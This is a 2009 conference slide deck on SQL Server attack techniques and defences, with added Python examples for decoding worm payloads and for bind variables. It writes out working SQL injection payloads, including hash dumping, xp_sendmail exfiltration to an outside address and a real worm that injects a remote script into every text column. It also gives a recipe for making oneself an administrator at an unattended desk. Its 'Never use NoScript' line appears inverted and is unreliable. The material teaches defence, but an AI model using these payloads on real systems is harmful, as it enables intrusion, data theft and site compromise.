Think like a hacker
DB attack vectors, Thwarting techniques




LogLogic SQL Server Hacking DBs April09

Sudha Iyer / LogLogic presentation: Think Like a Hacker: Database Attack Vectors and How to Thwart Them. Presentation to the San Francisco SQL Server User Group in April 2009.

Published in: Technology
Slide 1: Think like a hacker: DB attack vectors, thwarting techniques
Presented to the San Francisco SQL Server User Group (www.BayAreaSQL.org, leader: Mark Ginnebaugh)
presented by Sudha Iyer | Apr 8, 2009

Slide 2: What's This Presentation All About?
• Is there an enemy?
• Common database hacking techniques
• Raising the bar for the hackers
© Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 2

Slide 3: Why Protect The Database?
• Databases hold sensitive information, and lots of it: customer data, accounts, transactions, payroll, investor data
• When a breach occurs, the damage is significant: direct damages and costs, bad publicity, regulatory penalties

Slide 4: Some Recent Examples
• July 2005 – January 2007: TJX
    • 45.7M+ credit/debit card records stolen
    • Sophisticated attack (WiFi -> internal network -> DB)
    • Result: data sold to data brokers and used in many scams; TJX faces lawsuits and losses of $25M until May 07 (will grow considerably)
• July 2007: Fidelity National Information Services
    • Bank and credit data of 2.3M customers, stolen by a DBA
• And many more breaches… not only in the U.S. (e.g. the Home Office breach in the U.K.)
• Many breaches are unknown, not made public, or remain undetected
• Over 216,686,736 identifiable records in the US alone - http://www.privacyrights.org/ar/ChronDataBreaches.htm

Slide 5: Know Your Enemy
• Unauthorized access - not just hackers
    • Too many privileges
• Internal attacks
    • Disgruntled employees
    • Just trying to get the job done
    • Industrial espionage, identity theft, etc.
    • Look around you!!!
• External attacks
    • Web or network access

Slide 6: The Problems
• Does a hacker need DBA access?
• Myriad of privileges
    • System level, application level, data access
    • Any privilege in the right circumstances can be an issue
• Other issues
    • Network issues, incorrect configuration
    • Too many features – large attack surface

Slide 7: The Problems
• Most typical problems of real-world databases
    • Weak / default passwords for database accounts
    • Missing patches / patch sets – see http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm)
    • Insecure customer / 3rd-party code (T-SQL stored procedures)

Slide 8: Basic Hacking Techniques

Slide 9: Discovering databases
• Reconnaissance: nmap - http://nmap.org/
• SQLPing3 - http://sqlsecurity.com/

Slide 10: Is password the weakest link?
• Many brute-force tools out there

Slide 11: Powerful Tools Are Easily Available

Slide 12: Social Engineering
• Wait for your DBA to go for a coffee break
• Go to his desktop
• Open Management Studio
• Add yourself as an administrator to the database of your choice
• This can be easily scripted and put on a USB drive

Slide 13: SQL Injection
• Wikipedia: SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

Slide 14: SQL Injection
• Exists in any layer of any application
    • Web applications
    • Stored program units: built-in, user-created
• Has many forms
    • Extra queries, unions, order by, sub-selects
• Easily avoided
    • Bind variables, strong typing

Slide 15: SQL Injection Types
• In-band – use injection to return extra data
    • Part of the normal result set (unions)
    • In error messages
• Out-of-band – use an alternative route like UTL_HTTP or DNS to extract data
• Blind / inference – no data is returned, but the hacker is able to infer the data using return codes, error codes, timing measurements and more
Slide 16: SQL Injection In-band
select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
select name, password from sys.syslogins where password is not null
Result of the first query (the Employee row):
14417807 | 1209 | adventure-works\guy1 | 16 | Production Technician - WC60 | 1 | 1972-05-15 00:00:00.000 | M | M | 1996-07-31 00:00:00.000 | 0 | 21 | 30 | 1 | AAE1D04A-C237-4974-B4D5-935247737718 | 2004-07-31 00:00:00.000
Result of the second query: the logins sa and test, each with its binary password hash (rendered on the slide as unprintable characters).
Now, just attack the password hash using either brute force or a dictionary.

Slide 17: SQL Injection In-Band
Using errors – inject the following:
1 and 1 in (select @@version)
Result is:
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int.

Slide 18: SQL Injection Out-of-band
Send information via HTTP/SMTP/DNS to an external site:
select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null';
Slide 19: Blind SQL Injection
Example code:
IF is_srvrolemember('sysadmin') > 0 WAITFOR DELAY '0:0:5'
IF (ascii(substring(@string, @byte, 1)) & power(2, @bit)) > 0 WAITFOR DELAY '0:0:5'
Slide 20: SQL Injection – Web Application
• Username = ' or 1=1 --
• The original statement looked like:
    'select * from users where username = ''' + username + ''' and password = ''' + password + ''''
• The result:
    select * from users where username = '' or 1=1 --' and password = ''

Slide 21: Real World Example
• Mass SQL worm in the wild since April
• Enumerates all query/input fields and tries various SQL injection techniques
• Iterates over all text fields in the database and adds a link to the JScript
• Result? Data leakage… in broad daylight!

Slide 22: Real World Example
SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454 34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D205345542 05B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC
Wow, how to read this?
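Slide 22 asks how to read a payload like this. As an added example (not from the deck), here is a small Python helper a responder can run over web-server request lines to pull out CAST(0x… AS VARCHAR) blobs, decode them and flag T-SQL keywords worth a closer look. The request line and the hex inside it are constructed here, not the worm's own payload; the request path and the keyword watch list are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample request, NOT the worm's payload: we hex-encode a harmless T-SQL
# fragment ourselves so the expected decode is known and the line is self-consistent.
CONSTRUCTED_INNER_SQL = "DECLARE @T VARCHAR(255) /* constructed sample */"
CONSTRUCTED_HEX = CONSTRUCTED_INNER_SQL.encode("ascii").hex().upper()
CONSTRUCTED_REQUEST = (
    "GET /products.aspx?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + CONSTRUCTED_HEX
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1"
)

# CAST(0x<hex> AS VARCHAR|NVARCHAR ...) as written in the slide 22 payload.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)

# Assumed watch list: tokens the slide 23 worm body contains and a normal query string does not.
SUSPICIOUS_KEYWORDS = ("DECLARE", "EXEC", "CURSOR", "SYSOBJECTS",
                       "SYSCOLUMNS", "UPDATE", "<SCRIPT")


def decode_hex_casts(text):
    """Return the decoded string for every CAST(0x... AS VARCHAR) found in text.
    Percent-decoding comes first because web logs keep the query string URL-encoded;
    an odd-length run (truncated log line) is decoded up to its last complete byte."""
    decoded = []
    for match in HEX_CAST.finditer(unquote(text)):
        hexdigits = match.group(1)
        if len(hexdigits) % 2:
            hexdigits = hexdigits[:-1]
        # VARCHAR is single-byte, so latin-1 maps each byte to one character without loss.
        decoded.append(bytes.fromhex(hexdigits).decode("latin-1"))
    return decoded


def analyze_request(line):
    """Decode any hex-cast blobs in one request line and flag watch-list keywords inside them."""
    payloads = decode_hex_casts(line)
    flagged = sorted({kw for p in payloads for kw in SUSPICIOUS_KEYWORDS if kw in p.upper()})
    return {"payloads": payloads, "flagged": flagged, "suspicious": bool(flagged)}


if __name__ == "__main__":
    report = analyze_request(CONSTRUCTED_REQUEST)
    for payload in report["payloads"]:
        print("decoded:", payload)
    print("flagged:", report["flagged"])
```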
Slide 23: Real World Example
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chkadw.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Slide 24: Real World Example
The interesting part is here:
'UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000),['SOME_TEXT_COL']))+''<script src=http://www.chkadw.com/b.js></script>'''
Lesson Learned? Never use NoScript - even for trusted sites

Slide 25: Thwarting these attacks

Slide 26: Try the off-the-shelf tools yourself
• Think like a hacker
    • Learn about exploits
    • Always look for security issues: configuration, permissions, bugs
• Learn and use available tools
    • nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc.

Slide 27: Develop an information security policy ...and enforce it
• Apply patch sets and upgrades
    • Easier said than done
• Check for default and weak passwords regularly
• Secure the network
    • Valid node checking + firewall
    • Use encryption

Slide 28: Secure By Default; Secure Coding Practices
• Install only what you use, remove all else
    • Reduce your attack surface
• The least privilege principle
    • Lock down packages: system access, file access, network access
• Encrypt critical data
• Use secure coding techniques
    • Bind variables, input validation
    • Clear ownership of security issues
    • http://checklists.nist.gov/chklst_detail.cfm?config_id=157
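As an added example (not from the deck), the slide 20 concatenation beside the bind-variable and strong-typing form that slides 14 and 28 recommend, run against an in-memory SQLite database; the users and employee tables, their rows and the function names are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the deck's users table, plus an employee table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.execute("CREATE TABLE employee (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO employee VALUES (1, 'Production Technician')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the statement is assembled by string concatenation, as on slide 20."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_bound(conn, username, password):
    """Hardened: bind variables; the values travel separately from the statement text,
    so a quote or comment marker in the input stays data and never becomes syntax."""
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def employee_by_id(conn, raw_id):
    """Strong typing: a numeric parameter is converted before it reaches SQL, so an
    error-based probe like the slide 17 input raises ValueError instead of running."""
    emp_id = int(raw_id)
    return conn.execute("select * from employee where id = ?", (emp_id,)).fetchall()


def demo():
    """Run the slide 20 payload through both forms and a slide 17 probe through the typed lookup."""
    conn = make_db()
    payload = "' or 1=1 --"  # username from slide 20; password left empty
    try:
        employee_by_id(conn, "1 and 1 in (select @@version)")
        typed_rejects = False
    except ValueError:
        typed_rejects = True
    return {
        "concat_rows": len(login_concat(conn, payload, "")),        # every user: 2
        "bound_rows": len(login_bound(conn, payload, "")),          # no such user: 0
        "bound_valid": len(login_bound(conn, "alice", "s3cret")),   # real login still works: 1
        "typed_rejects": typed_rejects,                             # True
    }


if __name__ == "__main__":
    print(demo())
```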
Slide 29: Publish Coding Standards, Peer Review
• Avoid hardcoding username/password
• Wrap sensitive/important program code – even if not really safe
• Use fully qualified names for function and procedure calls
• Always validate user/database input
• Be careful with dynamic statements (cursors, SQL statements, …)
• Be careful with file access
• Be careful with OS command execution

Slide 30: Deploy Real Tools: Host-based Sensor Technology
• All database transactions, externally or internally initiated, must go through the shared / cache memory
• Minimal impact on performance – typically less than 5% of a single CPU
• No business interruption (no reboots or restarts)
• Supports SQL Server, Oracle, Sybase
[Diagram: host-based sensor on the DBMS shared memory; paths shown: stored procedure, trigger, bequeath / local connection, listener / network connection, view data]

Slide 31: Granular Policy-based Detection
• Security policies determined by granular rules:
    • Predefined (virtual patching) – zero effort
    • Wizard-driven templates for regulations
    • Administrator-defined
• Policy layers: Virtual Patching, Compliance Templates, Community Best Practices, Customer-Defined
• Example rule: IF App<>'SAPFinance' AND object = 'CC_Table' THEN Send HIGH Alert; Send mail to: security team; Terminate User Session; Quarantine User 60 minutes

Slide 32: LogLogic Database Security Manager
• Meet Compliance Requirements
    • Privileged user monitoring
    • Enforce segregation of duties
    • Protect sensitive data
    • Audit trail and reporting
    • Keep database patches up to date
    • Compensating control for protecting unencrypted data
• Complete Database Security
    • Protect against internal / external attacks
    • Cover all copies, locations and platforms
    • Operate in all environments (encryption, clustering, virtualization)
    • Defend against all types of attacks
    • "Always on" protection in real time

Slide 33: Integration with LogLogic Log Management Platform
• Database Security Manager: granular policy-based detection, automated database protection, real-time virtual patching
• LogLogic Open Log Management: compliance reporting, long-term archival, forensics analysis

Slide 34: Questions?
